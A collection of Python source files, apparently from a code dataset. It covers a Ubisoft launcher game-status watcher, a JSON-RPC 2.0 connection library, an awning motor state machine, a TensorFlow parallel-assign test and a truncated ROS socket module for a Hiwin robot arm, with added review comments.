                timeout=time.time() + 30,  # 30 s grace period
                type=ProcessType.Game if game else ProcessType.Launcher,
                game=game if game else None,
            )
            self.watched_processes.append(process)
            return process
        except Exception as e:
            # Was a silent bare ``except``: keep the best-effort None return
            # but log the reason instead of hiding it.
            log.error(f"Unable to watch process {repr(e)}")
            return None

    def update_watched_processes_list(self):
        """Drop entries whose underlying process is no longer running."""
        try:
            # Iterate over a snapshot: the original removed items from the
            # list while iterating it, which skips the element after each
            # removal and could leave dead processes in the list.
            for proc in list(self.watched_processes):
                if not proc.process.is_running():
                    log.info(f"Removing {proc}")
                    self.watched_processes.remove(proc)
        except Exception as e:
            log.error(f"Error removing process from watched processes list {repr(e)}")
class GameStatusNotifier(object):
    """Polls installed/running status for known Ubisoft games.

    On Windows a daemon thread re-reads the launcher log roughly once per
    second and refreshes ``self.statuses`` (install_id -> GameStatus).
    """

    def __init__(self, process_watcher):
        self.process_watcher = process_watcher
        self.games = {}     # install_id -> UbisoftGame
        # NOTE(review): ``watchers`` is read in update_game() but never
        # written anywhere in this class — verify against the full file.
        self.watchers = {}
        self.statuses = {}  # install_id -> GameStatus, refreshed by _process_data
        self.launcher_log_path = None
        self._legacy_game_launched = False
        if SYSTEM == System.WINDOWS:
            Thread(target=self._process_data, daemon=True).start()

    def update_game(self, game: UbisoftGame):
        """Register or refresh a game record, keyed by its install_id."""
        # NOTE(review): since self.watchers is never populated, this guard
        # appears dead and every call falls through to the assignment — confirm.
        if game.install_id in self.watchers:
            if game.path == self.watchers[game.install_id].path:
                return
        self.games[game.install_id] = game

    def _is_process_alive(self, game):
        """Return True while the watcher still tracks a running process for *game*."""
        try:
            self.process_watcher.update_watched_processes_list()
            for process in self.process_watcher.watched_processes:
                if process.type == ProcessType.Game:
                    if process.game.install_id == game.install_id:
                        return True
            return False
        except Exception as e:
            log.error(f"Error checking if process is alive {repr(e)}")
            return False

    def _get_process_by_path(self, game: UbisoftGame):
        """Find a pid whose executable path contains the game's install path.

        Prefers the parent pid when the parent executable is the game binary
        itself. Returns None (implicitly) when nothing matches.
        """
        for p in psutil.process_iter(attrs=['exe'], ad_value=''):
            if game.path.lower() in p.info['exe'].lower():
                try:
                    if p.parent() and p.parent().exe() == game.path:
                        return p.parent().pid
                    return p.pid
                except (psutil.AccessDenied, psutil.NoSuchProcess):
                    pass

    def _handle_legacy_game_log(self, game):
        """Resolve the running state of a legacy game (no pid in the launcher log)."""
        if self._legacy_game_launched:
            # A launch was requested: try to locate the new process by path.
            pid = self._get_process_by_path(game)
            if pid:
                self.process_watcher.watch_process(psutil.Process(int(pid)), game)
                self._legacy_game_launched = False
                return True
            else:
                return False
        else:
            # test if Legacy Game is still running
            return self._is_process_alive(game)

    def _read_log_data(self, game, log_line):
        """Interpret one launcher-log line for *game*.

        Returns True/False when the line is conclusive, or None (implicitly)
        when the line says nothing about this game.
        """
        if "disconnected" in log_line:
            return False
        if "has been started with product id" in log_line and f' {game.launch_id} (' in log_line:
            pid = int(re.search('Game with process id ([-+]?[0-9]+) has been started', log_line).group(1))
            if pid:
                self.process_watcher.watch_process(psutil.Process(pid), game)
                return True
        # only when clicked PLAY on Legacy game
        if game.type == GameType.Legacy:
            if "Failed to fetch club game. Missing space id" in log_line:
                return self._handle_legacy_game_log(game)

    def _parse_log(self, game, line_list):
        """Scan log lines newest-to-oldest for a conclusive running/stopped verdict."""
        if line_list:
            try:
                line = len(line_list) - 1
                # NOTE(review): ``while line > 0`` never examines index 0 —
                # possibly an off-by-one; confirm whether line 0 matters.
                while line > 0:
                    game_status = self._read_log_data(game, line_list[line])
                    if game_status is not None:
                        return game_status
                    line = line - 1
                return False
            except Exception as e:
                log.error(f"Error parsing launcher log file is game running {repr(e)}")
                return False
        else:
            return False

    def _is_game_running(self, game, line_list):
        """Decide whether *game* is currently running.

        NOTE(review): ``self.statuses`` is written keyed by install_id in
        _process_data but looked up by launch_id here — verify the two ids
        coincide, otherwise this branch never fires.
        """
        try:
            if game.launch_id in self.statuses:
                if self.statuses[game.launch_id] == GameStatus.Running:
                    # already running: just check the tracked process
                    return self._is_process_alive(game)
                else:
                    return self._parse_log(game, line_list)
            else:
                return False
        except Exception as e:
            log.error(f"Error in checking is game running {line_list} {game.launch_id} / {repr(e)}")

    def _get_launcher_log_lines(self, number_of_lines):
        """Return up to the last *number_of_lines* launcher-log lines, oldest first."""
        line_list = []
        if self.launcher_log_path:
            try:
                with FileReadBackwards(self.launcher_log_path, encoding="utf-8") as fh:
                    [line_list.append(fh.readline()) for _ in range(number_of_lines)]
            except FileNotFoundError:
                pass  # log not created yet: treat as empty
            except UnicodeDecodeError:
                log.warning(
                    f"Can't read launcher log at {self.launcher_log_path}, UnicodeDecodeError when reading log lines")
            except Exception as e:
                log.warning(
                    f"Can't read launcher log at {self.launcher_log_path}, unable to read running games statuses: {repr(e)}")
        # FileReadBackwards yields newest first; restore chronological order.
        return line_list[::-1]

    def _get_game_status(self, game, line_list):
        """Compute the GameStatus for one game (NotInstalled/Installed/Running)."""
        status = None
        if game.type == GameType.Steam:
            status = get_steam_game_status(game.path)
        else:
            if not game.path:
                game.path = get_local_game_path(game.special_registry_path, game.launch_id)
            status = get_game_installed_status(game.path, game.exe, game.special_registry_path)
        if status == GameStatus.Installed:
            if self._is_game_running(game, line_list):
                status = GameStatus.Running
        return status

    def _process_data(self):
        """Daemon loop (Windows only): refresh every game's status once per second."""
        statuses = self.statuses
        while True:
            line_list = self._get_launcher_log_lines(20)
            if line_list:
                try:
                    for install_id, game in self.games.items():
                        statuses[install_id] = self._get_game_status(game, line_list)
                except Exception as e:
                    log.error(f"Process data error {repr(e)}")
            self.statuses = statuses
            time.sleep(1)
|
jsonrpc.py | import json
import logging
try:
import Queue
except ImportError:
import queue as Queue
import threading
from collections import deque
log = logging.getLogger(__name__)
class JSONRPC2ProtocolError(Exception):
    """Raised when an incoming message violates the JSON-RPC 2.0 framing rules."""
    pass
class ReadWriter:
    """Wraps a binary reader/writer pair, decoding input and encoding output as UTF-8."""

    def __init__(self, reader, writer):
        self.reader = reader
        self.writer = writer

    def readline(self, *args):
        """Read one line from the underlying reader and decode it."""
        raw = self.reader.readline(*args)
        return raw.decode("utf-8")

    def read(self, *args):
        """Read from the underlying reader and decode the bytes."""
        raw = self.reader.read(*args)
        return raw.decode("utf-8")

    def write(self, out):
        """Encode *out* and write it, flushing immediately."""
        encoded = out.encode()
        self.writer.write(encoded)
        self.writer.flush()
class TCPReadWriter(ReadWriter):
    """ReadWriter variant used for TCP streams.

    NOTE(review): all three overrides are behaviorally identical to the
    ReadWriter base implementations; the subclass currently only serves as
    a marker type — confirm before collapsing it into the base class.
    """

    def readline(self, *args):
        data = self.reader.readline(*args)
        return data.decode("utf-8")

    def read(self, *args):
        return self.reader.read(*args).decode("utf-8")

    def write(self, out):
        self.writer.write(out.encode())
        self.writer.flush()
class JSONRPC2Connection:
    """Sends and receives framed JSON-RPC 2.0 messages over a ReadWriter-like conn.

    Messages are framed with ``Content-Length``/``Content-Type`` headers,
    terminated by a blank ``\r\n`` line, followed by the JSON body.
    """

    def __init__(self, conn=None):
        self.conn = conn
        self._msg_buffer = deque()  # received messages not yet claimed by a reader
        self._next_id = 1           # monotonically increasing request id

    def _read_header_content_length(self, line):
        """Parse a Content-Length header line.

        Returns the announced byte count, or None (implicitly) for any
        other header line. Raises JSONRPC2ProtocolError on bad framing.
        """
        if len(line) < 2 or line[-2:] != "\r\n":
            raise JSONRPC2ProtocolError("Line endings must be \\r\\n")
        if line.startswith("Content-Length: "):
            _, value = line.split("Content-Length: ")
            value = value.strip()
            try:
                return int(value)
            except ValueError:
                raise JSONRPC2ProtocolError(
                    "Invalid Content-Length header: {0}".format(value))

    def _receive(self):
        """Read one framed message; raises EOFError at end of stream.

        NOTE(review): assumes the FIRST header line carries Content-Length;
        a different first header would make ``length`` None — confirm peers
        always send Content-Length first.
        """
        line = self.conn.readline()
        if line == "":
            raise EOFError()
        length = self._read_header_content_length(line)
        # Keep reading headers until we find the sentinel
        # line for the JSON request.
        while line != "\r\n":
            line = self.conn.readline()
        body = self.conn.read(length)
        log.debug("RECV %s", body)
        return json.loads(body)

    def read_message(self, want=None):
        """Read a JSON RPC message sent over the current connection.

        If *want* is None, the next available message is returned.
        Otherwise *want* is a predicate; messages that do not match are
        buffered for future callers.
        """
        if want is None:
            if self._msg_buffer:
                return self._msg_buffer.popleft()
            return self._receive()
        # First check if our buffer contains something we want.
        msg = deque_find_and_pop(self._msg_buffer, want)
        if msg:
            return msg
        # We need to keep receiving until we find something we want.
        # Things we don't want are put into the buffer for future callers.
        while True:
            msg = self._receive()
            if want(msg):
                return msg
            self._msg_buffer.append(msg)

    def _send(self, body):
        """Serialize *body* compactly and write it with framing headers."""
        body = json.dumps(body, separators=(",", ":"))
        content_length = len(body)
        response = (
            "Content-Length: {0}\r\n"
            "Content-Type: application/vscode-jsonrpc; charset=utf8\r\n\r\n"
            "{1}".format(content_length, body))
        self.conn.write(response)
        log.debug("SEND %s", body)

    def write_response(self, rid, result):
        """Send a success response for request id *rid*."""
        body = {
            "jsonrpc": "2.0",
            "id": rid,
            "result": result,
        }
        self._send(body)

    def write_error(self, rid, code, message, data=None):
        """Send an error response; *data* is attached only when provided."""
        e = {
            "code": code,
            "message": message,
        }
        if data is not None:
            e["data"] = data
        body = {
            "jsonrpc": "2.0",
            "id": rid,
            "error": e,
        }
        self._send(body)

    def send_request(self, method, params):
        """Send a request and block until its matching response arrives."""
        rid = self._next_id
        self._next_id += 1
        body = {
            "jsonrpc": "2.0",
            "id": rid,
            "method": method,
            "params": params,
        }
        self._send(body)
        return self.read_message(want=lambda msg: msg.get("id") == rid)

    def send_notification(self, method, params):
        """Send a notification (no id, so no response is expected)."""
        body = {
            "jsonrpc": "2.0",
            "method": method,
            "params": params,
        }
        self._send(body)

    def send_request_batch(self, requests):
        """Pipelines requests and returns responses.

        The responses is a generator where the nth response corresponds
        with the nth request. Users must read the generator until the end,
        otherwise you will leak a thread.
        """
        # We communicate the request ids using a thread safe queue.
        # It also allows us to bound the number of concurrent requests.
        q = Queue.Queue(100)

        def send():
            # Runs on its own thread, pushing requests while the caller
            # consumes responses from the generator below.
            for method, params in requests:
                rid = self._next_id
                self._next_id += 1
                q.put(rid)
                body = {
                    "jsonrpc": "2.0",
                    "id": rid,
                    "method": method,
                    "params": params,
                }
                self._send(body)
            # Sentinel value to indicate we are done
            q.put(None)

        threading.Thread(target=send).start()
        while True:
            rid = q.get()
            if rid is None:
                break
            yield self.read_message(want=lambda msg: msg.get("id") == rid)
def deque_find_and_pop(d, f):
    """Remove and return the first element of deque *d* matching predicate *f*.

    Returns None when nothing matches; otherwise the deque keeps its
    original order minus the popped element.
    """
    for offset, candidate in enumerate(d):
        if f(candidate):
            break
    else:
        return None
    # Rotate the match to the front, pop it, then restore the order.
    d.rotate(-offset)
    match = d.popleft()
    d.rotate(offset)
    return match
def write_rpc_request(rid, method, params):
    """Serialize a JSON-RPC 2.0 request (with id) into a framed wire string."""
    payload = json.dumps(
        {"jsonrpc": "2.0", "id": rid, "method": method, "params": params},
        separators=(",", ":"),
    )
    header = (
        "Content-Length: {0}\r\n"
        "Content-Type: application/vscode-jsonrpc; charset=utf8\r\n\r\n"
    ).format(len(payload))
    return header + payload
def write_rpc_notification(method, params):
    """Serialize a JSON-RPC 2.0 notification (no id) into a framed wire string."""
    payload = json.dumps(
        {"jsonrpc": "2.0", "method": method, "params": params},
        separators=(",", ":"),
    )
    header = (
        "Content-Length: {0}\r\n"
        "Content-Type: application/vscode-jsonrpc; charset=utf8\r\n\r\n"
    ).format(len(payload))
    return header + payload
def read_rpc_messages(content):
    """Parse every framed JSON-RPC message from *content* until EOF.

    *content* must expose ``readline()`` and ``read(n)`` returning str.
    Returns the decoded messages as a list (possibly empty).
    """
    def header_length(line):
        # Frames are delimited with CRLF; anything else is a protocol error.
        if len(line) < 2 or line[-2:] != "\r\n":
            raise JSONRPC2ProtocolError("Line endings must be \\r\\n")
        if line.startswith("Content-Length: "):
            _, value = line.split("Content-Length: ")
            value = value.strip()
            try:
                return int(value)
            except ValueError:
                raise JSONRPC2ProtocolError(
                    "Invalid Content-Length header: {0}".format(value))

    def next_message():
        line = content.readline()
        if line == "":
            raise EOFError()
        length = header_length(line)
        # Skip the remaining headers up to the blank sentinel line.
        while line != "\r\n":
            line = content.readline()
        return json.loads(content.read(length))

    messages = []
    while True:
        try:
            messages.append(next_message())
        except EOFError:
            return messages
|
awning.py | import logging
import sys
import time
from datetime import datetime
from abc import ABC, abstractmethod
from threading import Thread, Lock
class Motor(ABC):
    """Hardware abstraction for the awning drive motor.

    Concrete implementations wrap the actual driver calls; the Movement
    state machine talks only to this interface.
    """

    @abstractmethod
    def stop(self):
        """Stop the motor immediately."""
        pass

    @abstractmethod
    def backward(self):
        """Run the motor in the retracting direction (used by Backward)."""
        pass

    @abstractmethod
    def forward(self):
        """Run the motor in the extending direction (used by Forward)."""
        pass

    @property
    @abstractmethod
    def name(self) -> str:
        """Human-readable motor name (also used to name the worker thread)."""
        pass

    @property
    @abstractmethod
    def sec_per_step(self) -> float:
        """Seconds the motor needs to travel one position slot."""
        pass
class AwningPropertyListener:
    """No-op default listener; Awning.register_listener() swaps in a real observer."""

    def on_current_pos_updated(self, current_position: int):
        # Called whenever the estimated position changes.
        pass

    def on_retracting_updated(self, retracting: bool):
        # Called when the awning starts/stops retracting.
        pass

    def on_extenting_updated(self, extenting: bool):
        # Called when the awning starts/stops extending.
        pass
class Movement:
    """Time-based model of a motor run from start_pos toward a target position.

    Positions are expressed in "slots" (clamped to 0..100 by drive_to);
    progress is estimated from elapsed wall-clock time rather than sensor
    feedback, at ``sec_per_slot`` seconds per slot.
    """

    # Position difference (in slots) below which no new movement is started.
    SLOT_TOLERANCE = 7

    def __init__(self, motor: Motor, start_pos: int, num_slots: int, sec_per_slot: float, is_positive: bool, awning):
        self.start_time = datetime.now()
        self.awning = awning
        self.motor = motor
        self.start_pos = start_pos
        self.num_slots = num_slots
        self.sec_per_slot = sec_per_slot
        # direction: +1 extends (position grows), -1 retracts.
        if is_positive:
            self.direction = 1
        else:
            self.direction = -1

    def get_pause_sec(self):
        """Polling interval (seconds) of the processing loop while moving."""
        return 0.5

    def get_current_pos(self) -> int:
        """Estimated current position, clamped to the target once it is reached."""
        if self.is_target_reached():
            return self.get_target_pos()
        else:
            return self.start_pos + (self.__get_num_processed_slots() * self.direction)

    def get_target_pos(self) -> int:
        """Position this movement is heading to."""
        return self.start_pos + (self.num_slots * self.direction)

    def is_target_reached(self) -> bool:
        """True once enough wall-clock time has passed to cover all slots."""
        return self.__get_num_processed_slots() >= self.num_slots

    def __get_num_processed_slots(self) -> int:
        # The first second of a movement counts as no progress.
        elapsed_sec = (datetime.now() - self.start_time).total_seconds()
        num_processed = 0
        if elapsed_sec > 1:
            num_processed = elapsed_sec / self.sec_per_slot
        return int(num_processed)

    def process(self):
        """Advance the state machine; returns the (possibly new) state object."""
        if self.is_target_reached():
            # Done: park in an Idling state at the target position.
            return Idling(self.motor, self.get_target_pos(), self.sec_per_slot, self.awning)
        else:
            self.awning.listener.on_current_pos_updated(self.get_current_pos())
            return self

    def drive_to(self, new_position: int):
        """Return the movement state driving toward *new_position* (clamped to 0..100)."""
        if new_position > 100:
            new_position = 100
        elif new_position < 0:
            new_position = 0
        return self.__create_movement(int(new_position))

    def __create_movement(self, new_position: int):
        # Start a motor run only when the error exceeds SLOT_TOLERANCE;
        # otherwise stay (or become) idle at the current position.
        current_pos = self.get_current_pos()
        if (new_position - current_pos) > self.SLOT_TOLERANCE:
            return Forward(self.motor, current_pos, new_position, self.sec_per_slot, self.awning)
        elif (current_pos - new_position) > self.SLOT_TOLERANCE:
            return Backward(self.motor, current_pos, new_position, self.sec_per_slot, self.awning)
        else:
            return Idling(self.motor, current_pos, self.sec_per_slot, self.awning)
class Idling(Movement):
    """Motionless state: motor stopped, position held at *start_pos*."""

    def __init__(self, motor: Motor, start_pos: int, sec_per_slot: float, awning):
        # A zero-slot "movement" whose target equals its start position.
        Movement.__init__(self, motor, start_pos, 0, sec_per_slot, True, awning)
        self.motor.stop()
        self.awning.listener.on_extenting_updated(False)
        self.awning.listener.on_retracting_updated(False)

    def get_pause_sec(self):
        """Poll interval while idle: scales with the slot time, minimum 3 s."""
        return max(3, int(self.SLOT_TOLERANCE * self.sec_per_slot * 1.4))

    def process(self):
        # Idling never transitions by itself; drive_to() creates new movements.
        return self
class Forward(Movement):
    """Active extension: motor runs forward from start_pos up to new_position."""

    def __init__(self, motor: Motor, start_pos: int, new_position: int, sec_per_slot: float, awning):
        # num_slots = distance to travel; direction positive (extending).
        Movement.__init__(self, motor, start_pos, new_position - start_pos, sec_per_slot, True, awning)
        self.motor.forward()
        # Notify listeners in this order: extending on, retracting off.
        self.awning.listener.on_extenting_updated(True)
        self.awning.listener.on_retracting_updated(False)
class Backward(Movement):
    """Active retraction: motor runs backward from start_pos down to new_position."""

    def __init__(self, motor: Motor, start_pos: int, new_position: int, sec_per_slot: float, awning):
        # num_slots = distance to travel; direction negative (retracting).
        Movement.__init__(self, motor, start_pos, start_pos - new_position, sec_per_slot, False, awning)
        self.motor.backward()
        # Notify listeners in this order: retracting on, extending off.
        self.awning.listener.on_retracting_updated(True)
        self.awning.listener.on_extenting_updated(False)
class Awning:
    """Facade owning the movement state machine plus its worker threads.

    A non-daemon thread steps the state machine; a daemon thread re-runs
    calibration once per day inside the configured time window.
    """

    # Daily calibration window opens at 03:10 and lasts until 04:00.
    PERIODIC_CALIBRATE_ON_HOUR = 3
    PERIODIC_CALIBRATE_ON_MINUTE = 10

    def __init__(self, motor: Motor):
        self.sec_per_slot = motor.sec_per_step
        self.listener = AwningPropertyListener()  # no-op until register_listener()
        self.motor = motor
        self.__lock = Lock()  # guards self.movement (worker thread vs. setters)
        self.movement = Idling(self.motor, 0, self.sec_per_slot, self)
        self.set_target_position(0)
        Thread(name=self.name + "_move", target=self.__process_move, daemon=False).start()
        Thread(target=self.__periodic_calibrate, daemon=True).start()

    @property
    def name(self) -> str:
        """Name of the underlying motor."""
        return self.motor.name

    def __periodic_calibrate(self):
        """Calibrate once shortly after start-up, then daily inside the window."""
        time.sleep(60)
        self.calibrate()
        already_scheduled = False  # ensures at most one calibration per window
        while True:
            now = datetime.now()
            if self.PERIODIC_CALIBRATE_ON_HOUR <= now.hour < (self.PERIODIC_CALIBRATE_ON_HOUR + 1) and now.minute >= self.PERIODIC_CALIBRATE_ON_MINUTE:
                if not already_scheduled:
                    self.calibrate()
                    already_scheduled = True
            else:
                already_scheduled = False
            time.sleep(10 * 60)

    def register_listener(self, listener: AwningPropertyListener):
        """Replace the no-op listener with a real observer."""
        self.listener = listener

    def calibrate(self):
        """Re-zero the time-based position estimate, then restore the target.

        Pretends the current position is 100% and drives to 0, so the
        physical end stop re-synchronizes the estimate with reality.
        NOTE(review): the direct ``self.movement`` assignment below bypasses
        ``__lock`` — confirm this race with __process_move is acceptable.
        """
        saved_target_pos = self.get_target_position()
        logging.info("calibrating")
        self.movement = Idling(self.motor, 100, self.sec_per_slot, self)  # assume fully open (100%)
        self.set_target_position(0)  # drive to 0 so the end stop defines position 0
        # wait until completed (up to 60 * 5 s = 5 minutes)
        for i in range (0, 60):
            if self.is_target_reached():
                break
            else:
                time.sleep(5)
        if self.get_current_position() != saved_target_pos:
            logging.info("move to previous target position " + str(saved_target_pos))
            self.set_target_position(saved_target_pos)

    def is_target_reached(self) -> bool:
        """True when the current movement has covered all of its slots."""
        return self.movement.is_target_reached()

    def get_current_position(self) -> int:
        """Estimated current position (0..100)."""
        return self.movement.get_current_pos()

    def get_target_position(self) -> int:
        """Target position of the current movement."""
        return self.movement.get_target_pos()

    def set_target_position(self, new_position: int):
        """Request a new target (clamped to 0..100); transitions under the lock."""
        with self.__lock:
            self.movement = self.movement.drive_to(new_position)

    def __process_move(self):
        """Worker loop: step the state machine; reset to Idling(0) on any error."""
        while True:
            with self.__lock:
                try:
                    self.movement = self.movement.process()
                except:
                    # NOTE(review): bare except also swallows SystemExit and
                    # KeyboardInterrupt — consider ``except Exception``.
                    self.movement = Idling(self.motor, 0, self.sec_per_slot, self)
                    logging.warning('move operation failed ' + str(sys.exc_info()))
                finally:
                    pause_sec = self.movement.get_pause_sec()
            time.sleep(pause_sec)
|
dense_update_ops_no_tsan_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for state updating ops that may have benign race conditions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class AssignOpTest(test.TestCase):
    """Stress tests for parallel variable updates with and without locking."""

    # NOTE(mrry): We exclude these tests from the TSAN TAP target, because they
    # contain benign and deliberate data races when multiple threads update
    # the same parameters without a lock.

    def testParallelUpdateWithoutLocking(self):
        """20 unlocked assign_adds: the result lies between 1 and 20 full adds."""
        with self.cached_session() as sess:
            ones_t = array_ops.fill([1024, 1024], 1.0)
            p = variables.Variable(array_ops.zeros([1024, 1024]))
            adds = [
                state_ops.assign_add(
                    p, ones_t, use_locking=False) for _ in range(20)
            ]
            variables.global_variables_initializer().run()

            def run_add(add_op):
                self.evaluate(add_op)

            threads = [
                self.checkedThread(
                    target=run_add, args=(add_op,)) for add_op in adds
            ]
            for t in threads:
                t.start()
            for t in threads:
                t.join()

            vals = self.evaluate(p)
            # Races may lose updates, but every element saw at least one add
            # and at most all twenty.
            ones = np.ones((1024, 1024)).astype(np.float32)
            self.assertTrue((vals >= ones).all())
            self.assertTrue((vals <= ones * 20).all())

    def testParallelAssignWithoutLocking(self):
        """20 unlocked assigns of i*ones: every element ends up in [1, 20]."""
        with self.cached_session() as sess:
            ones_t = array_ops.fill([1024, 1024], float(1))
            p = variables.Variable(array_ops.zeros([1024, 1024]))
            assigns = [
                state_ops.assign(p, math_ops.multiply(ones_t, float(i)), False)
                for i in range(1, 21)
            ]
            variables.global_variables_initializer().run()

            def run_assign(assign_op):
                self.evaluate(assign_op)

            threads = [
                self.checkedThread(
                    target=run_assign, args=(assign_op,)) for assign_op in assigns
            ]
            for t in threads:
                t.start()
            for t in threads:
                t.join()

            vals = self.evaluate(p)
            # Assert every element is taken from one of the assignments.
            self.assertTrue((vals > 0).all())
            self.assertTrue((vals <= 20).all())

    # NOTE(skyewm): We exclude these tests from the TSAN TAP target, because they
    # contain non-benign but known data races between the variable assignment and
    # returning the output tensors. This issue will be resolved with the new
    # resource variables.

    def testParallelUpdateWithLocking(self):
        """20 locked assign_adds: the result is exactly 20 everywhere."""
        with self.cached_session() as sess:
            zeros_t = array_ops.fill([1024, 1024], 0.0)
            ones_t = array_ops.fill([1024, 1024], 1.0)
            p = variables.Variable(zeros_t)
            adds = [
                state_ops.assign_add(
                    p, ones_t, use_locking=True) for _ in range(20)
            ]
            p.initializer.run()

            def run_add(add_op):
                self.evaluate(add_op)

            threads = [
                self.checkedThread(
                    target=run_add, args=(add_op,)) for add_op in adds
            ]
            for t in threads:
                t.start()
            for t in threads:
                t.join()

            vals = self.evaluate(p)
            ones = np.ones((1024, 1024)).astype(np.float32)
            self.assertAllEqual(vals, ones * 20)

    def testParallelAssignWithLocking(self):
        """20 locked assigns: one of them wins atomically for the whole tensor."""
        with self.cached_session() as sess:
            zeros_t = array_ops.fill([1024, 1024], 0.0)
            ones_t = array_ops.fill([1024, 1024], 1.0)
            p = variables.Variable(zeros_t)
            assigns = [
                state_ops.assign(
                    p, math_ops.multiply(ones_t, float(i)), use_locking=True)
                for i in range(1, 21)
            ]
            p.initializer.run()

            def run_assign(assign_op):
                self.evaluate(assign_op)

            threads = [
                self.checkedThread(
                    target=run_assign, args=(assign_op,)) for assign_op in assigns
            ]
            for t in threads:
                t.start()
            for t in threads:
                t.join()

            vals = self.evaluate(p)
            # Assert every element is the same, and taken from one of the assignments.
            self.assertTrue(vals[0, 0] > 0)
            self.assertTrue(vals[0, 0] <= 20)
            self.assertAllEqual(vals, np.ones([1024, 1024]) * vals[0, 0])
# Standard TensorFlow test entry point.
if __name__ == "__main__":
    test.main()
|
Hiwin_RT605_ArmCommand_Socket_20190627160417.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
# Module-wide state shared between the ROS callbacks and the socket thread.
Socket = 0               # placeholder; replaced by the real socket in socket_client()
data = '0'               # initial value of the transmit payload
Arm_feedback = 1         # assume the arm is busy at start-up
state_feedback = 0
NAME = 'socket_server'   # ROS node name
client_response = 0      # initial reply counter
point_data_flag = False  # set when a new target pose has arrived
arm_mode_flag = False    # set when a new arm command is pending
speed_mode_flag = False  # set when a new speed mode is pending
Socket_sent_flag = False # echo of the controller's sent-confirmation flag
##------------class pos-------
class point():
    """Mutable 6-DOF pose: Cartesian position (x, y, z) plus Euler angles."""

    def __init__(self, x, y, z, pitch, roll, yaw):
        self.x, self.y, self.z = x, y, z
        self.pitch, self.roll, self.yaw = pitch, roll, yaw

# Shared current target pose, updated by point_data().
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
    """Bundle of arm-command fields shared between the ROS callbacks and the sender.

    Note: the rest of this module assigns these as *class* attributes
    (no instance is ever created).
    """

    def __init__(self, grip, setvel, ra, delay, setboth, action, Speedmode):
        self.grip, self.setvel, self.ra = grip, setvel, ra
        self.delay, self.setboth = delay, setboth
        self.action, self.Speedmode = action, Speedmode
##-----------switch define------------##
class switch(object):
    """Tiny switch/case helper: iterate once to get ``match``, break on the first hit.

    Usage::

        for case in switch(value):
            if case(1): ...; break
            if case(2): ...; break
    """

    def __init__(self, value):
        self.value = value
        self.fall = False  # True once a case matched, enabling fall-through

    def __iter__(self):
        """Return the match method once, then stop."""
        yield self.match
        # Bug fix: the original ``raise StopIteration`` here turns into a
        # RuntimeError under PEP 479 (Python 3.7+) whenever no case breaks
        # out of the for-loop; simply returning ends the generator cleanly.
        return

    def match(self, *args):
        """Indicate whether or not to enter a case suite."""
        if self.fall or not args:
            return True
        elif self.value in args:
            self.fall = True
            return True
        else:
            return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
    """Forward the arm's busy/ready state to the 'arm_state' ROS service.

    Blocks until the service is available; returns the service response,
    or None (implicitly) when the call fails.
    """
    global state_feedback
    rospy.wait_for_service('arm_state')
    try:
        Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
        state_feedback = Arm_state_client(Arm_state)
        #pos_feedback_times = pos_feedback.response
        return state_feedback
    except rospy.ServiceException as e:
        print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
def socket_client_sent_flag(Sent_flag):
    """Forward the socket sent-confirmation flag to the 'sent_flag' ROS service.

    Blocks until the service is available; returns the service response,
    or None (implicitly) when the call fails.
    """
    global sent_feedback
    rospy.wait_for_service('sent_flag')
    try:
        Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
        sent_feedback = Sent_flag_client(Sent_flag)
        #pos_feedback_times = pos_feedback.response
        return sent_feedback
    except rospy.ServiceException as e:
        print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(x,y,z,pitch,roll,yaw):
    """Store an incoming target pose from the strategy side into the shared ``pos``."""
    global client_response, point_data_flag
    pos.x, pos.y, pos.z = x, y, z
    pos.pitch, pos.roll, pos.yaw = pitch, roll, yaw
    point_data_flag = True
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth):  # receives the arm-mode command from the strategy side
    """Store an arm command and immediately forward it via Socket_command().

    Note: the values are stored as *class* attributes on socket_cmd — no
    instance of socket_cmd is created anywhere in this module.
    """
    global arm_mode_flag
    socket_cmd.action = action
    socket_cmd.grip = grip
    socket_cmd.ra = ra
    socket_cmd.setvel = setvel
    socket_cmd.setboth = setboth
    arm_mode_flag = True
    Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode):  # receives the arm speed-mode setting from the strategy side
    """Store the requested speed mode (fast/safe) on socket_cmd.

    Bug fix: the original body read ``req.Speedmode`` although no ``req``
    exists in scope — the value arrives as the ``speedmode`` parameter —
    so every call raised NameError.
    """
    global speed_mode_flag
    socket_cmd.Speedmode = int(speedmode)
    speed_mode_flag = True
    #Socket_command()
    return 1
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server():  # create the ROS server node
    """Initialize the ROS node and block in rospy.spin().

    All service registrations are commented out, so this node currently
    only keeps the process alive while the socket-client thread runs.
    """
    rospy.init_node(NAME)
    # a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
    # s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
    # b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
